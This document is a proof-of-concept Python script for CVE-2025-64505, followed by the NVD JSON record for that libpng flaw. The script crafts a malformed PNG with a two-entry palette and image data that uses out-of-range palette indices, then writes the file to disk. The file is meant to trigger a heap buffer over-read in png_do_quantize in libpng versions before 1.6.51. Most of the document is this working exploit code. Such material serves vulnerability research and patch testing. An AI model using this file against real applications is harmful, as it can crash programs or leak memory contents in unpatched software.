CVE-2025-64505

#!/usr/bin/env python3 """ CVE-2025-64505 PoC - Malformed PNG with out-of-range palette indices This PoC demonstrates the heap buffer over-read in libpng's png_do_quantize function. """ import struct import zlib def create_malformed_png(): """ Create a minimal PNG file with malformed palette indices that triggers the vulnerability in png_do_quantize """ # PNG signature png_sig = b'\x89PNG\r\n\x1a\n' # IHDR chunk - 8x8 pixel, 8-bit indexed color ihdr_data = struct.pack('>IIBBBBB', 8, 8, 8, 3, 0, 0, 0) ihdr_crc = zlib.crc32(b'IHDR' + ihdr_data) & 0xffffffff ihdr_chunk = struct.pack('>I', 13) + b'IHDR' + ihdr_data + struct.pack('>I', ihdr_crc) # PLTE chunk - Palette with only 2 entries (indices 0 and 1) # But we'll use indices beyond this range in the image data palette = b'\xff\x00\x00' + b'\x00\xff\x00' # Red and Green plte_crc = zlib.crc32(b'PLTE' + palette) & 0xffffffff plte_chunk = struct.pack('>I', 6) + b'PLTE' + palette + struct.pack('>I', plte_crc) # IDAT chunk - Image data with out-of-range palette indices # Normal indices would be 0-1, but we use 0-255 including out-of-range values raw_data = bytes([i % 256 for i in range(64)]) # 8x8 = 64 bytes, includes high indices compressed = zlib.compress(raw_data) idat_crc = zlib.crc32(b'IDAT' + compressed) & 0xffffffff idat_chunk = struct.pack('>I', len(compressed)) + b'IDAT' + compressed + struct.pack('>I', idat_crc) # IEND chunk iend_crc = zlib.crc32(b'IEND') & 0xffffffff iend_chunk = struct.pack('>I', 0) + b'IEND' + struct.pack('>I', iend_crc) return png_sig + ihdr_chunk + plte_chunk + idat_chunk + iend_chunk if __name__ == '__main__': png_data = create_malformed_png() with open('CVE-2025-64505_poc.png', 'wb') as f: f.write(png_data) print('PoC PNG file created: CVE-2025-64505_poc.png') print('This file contains out-of-range palette indices that may trigger') print('heap buffer over-read in vulnerable versions of libpng < 1.6.51')

{"cve": {"id": "CVE-2025-64505", "sourceIdentifier": "[email protected]", "published": "2025-11-25T00:15:47.133", "lastModified": "2025-11-26T18:28:32.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to version 1.6.51, a heap buffer over-read vulnerability exists in libpng's png_do_quantize function when processing PNG files with malformed palette indices. The vulnerability occurs when palette_lookup array bounds are not validated against externally-supplied image data, allowing an attacker to craft a PNG file with out-of-range palette indices that trigger out-of-bounds memory access. This issue has been patched in version 1.6.51."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.51", "matchCriteriaId": "A8B5D980-7DA8-4291-8723-4CDDF73B19F6"}]}]}], "references": [{"url": "https://github.com/pnggroup/libpng/commit/6a528eb5fd0dd7f6de1c39d30de0e41473431c37", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pnggroup/libpng/pull/748", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-4952-h5wq-4m42", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}